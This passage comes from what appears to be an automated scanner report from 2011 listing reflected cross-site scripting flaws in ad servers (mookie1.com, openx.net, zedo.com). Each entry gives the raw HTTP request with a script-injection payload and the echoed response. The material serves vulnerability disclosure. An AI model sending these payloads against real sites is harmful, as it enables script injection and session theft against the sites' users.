Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXfb522"><script>alert(1)</script>402135baf54/1175098218/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

4.44. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebfa7"><script>alert(1)</script>f3beed6f077 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71ebfa7"><script>alert(1)</script>f3beed6f077 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/55441945/x71ebfa7"><script>alert(1)</script>f3beed6f077/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC=
...[SNIP]...

4.45. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e85b3"><script>alert(1)</script>c1623e50091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3e85b3"><script>alert(1)</script>c1623e50091/Dominos/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3e85b3"><script>alert(1)</script>c1623e50091/Dominos/11Q1/Opt/120/1[timestamp]/1293087884/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.46. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd703"><script>alert(1)</script>0833f72734d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominosbd703"><script>alert(1)</script>0833f72734d/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominosbd703"><script>alert(1)</script>0833f72734d/11Q1/Opt/120/1[timestamp]/1325161057/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.47. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71872"><script>alert(1)</script>6ced5e37719 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q171872"><script>alert(1)</script>6ced5e37719/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q171872"><script>alert(1)</script>6ced5e37719/Opt/120/1[timestamp]/1889488496/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.48. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bfe"><script>alert(1)</script>ddbcff87e70 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt64bfe"><script>alert(1)</script>ddbcff87e70/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt64bfe"><script>alert(1)</script>ddbcff87e70/120/1[timestamp]/902406755/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.49. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e69"><script>alert(1)</script>5d8b3695d63 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/12037e69"><script>alert(1)</script>5d8b3695d63/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt/12037e69"><script>alert(1)</script>5d8b3695d63/1[timestamp]/641958665/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.50. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 679d0"><script>alert(1)</script>49f4f95843e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90679d0"><script>alert(1)</script>49f4f95843e HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]/1598009652/x90679d0"><script>alert(1)</script>49f4f95843e/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.51. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2e0e8%3balert(1)//1d431df288b was submitted in the c parameter. This input was echoed as 2e0e8;alert(1)//1d431df288b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /json?c=OXM_327285992212e0e8%3balert(1)//1d431df288b&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=728x90&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17101&hrid=39925b34906404a722d1479181f4316b-1295921102&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102; _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929665; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_327285992212e0e8;alert(1)//1d431df288b,o:null,w:13940000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/javascript'\u003eisIE \u003d true;\u003c/
...[SNIP]...

4.52. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload b3df4<script>alert(1)</script>6007943e0fa was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_15781025984b3df4<script>alert(1)</script>6007943e0fa&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=468x60&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17099&hrid=dda27c0e92ce176b4b94dc8a5861a24c-1295921101&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=72705fd6-57d0-40f5-a439-a5c5015891a3; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295929663; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984b3df4<script>alert(1)</script>6007943e0fa({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWPP07DMBxGn13iOHZoFkBigUowElEhNyED7
...[SNIP]...

4.53. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://c5.zedo.com
Path:   //ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320ca'%3bd13e48cf55b was submitted in the REST URL parameter 7. This input was echoed as 320ca';d13e48cf55b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/886284/2333/172/0/305002290320ca'%3bd13e48cf55b/305002290//0/305/788//2000004/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFgeo=5386156; FFcat=305,2290,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2085894141
Cache-Control: max-age=2591944
Expires: Wed, 23 Feb 2011 21:58:24 GMT
Date: Mon, 24 Jan 2011 21:59:20 GMT
Connection: close
Content-Length: 5232


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
y_date = new Date();
idx_expiry_date.setTime(idx_expiry_date.getTime() + (30*24*60*60*1000));
var idx_cTime = idx_expiry_date.toGMTString();
var idx_cVal = 'PI=' + 'h749620Za886284' + 'Zc' + '305002290320ca';d13e48cf55b%2C305002290' + 'Zs' + zzIdxSection + 'Zt' + age
if(document.domain.match(zd_domain)){
